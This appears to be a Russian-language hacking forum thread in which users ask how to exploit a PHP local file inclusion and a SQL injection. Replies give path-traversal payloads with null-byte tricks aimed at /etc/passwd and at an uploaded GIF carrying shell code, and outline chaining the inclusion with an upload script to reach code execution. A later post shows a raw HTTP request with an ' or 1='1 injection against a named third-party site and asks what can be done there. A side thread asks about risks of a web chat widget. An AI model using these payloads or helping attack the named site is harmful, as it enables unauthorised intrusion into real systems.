подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести

file.php?url=site.com%00 на такой запрос выдает ошибку

Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

на сколько я понимаю - url=../../../etc/passwd%00

url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00

при условии, что функция basename() нам ничего не портит.

file.php?url=../../../etc/passwd%00

Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

http://www.php.su/functions/?basename

то бишь вектор сужается до дириктории, из которой выполняется сценарий.

Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.

Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:

Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.phpпроверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее

всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?

Для начала скажите какую платформу вы используете.

В зависимости от этого можно будет обрисовать потенциальные уязвимости.

Опаснотсть представляют не чаты, опасность представляют упущения в коде.

А за небольшую сумму проведу black box + white box аудит с подробным отчетом.

Что можно сделать тут?

SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1

Host: www.rapibus.sto.ca

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie:

Connection: close

Content-Length: 0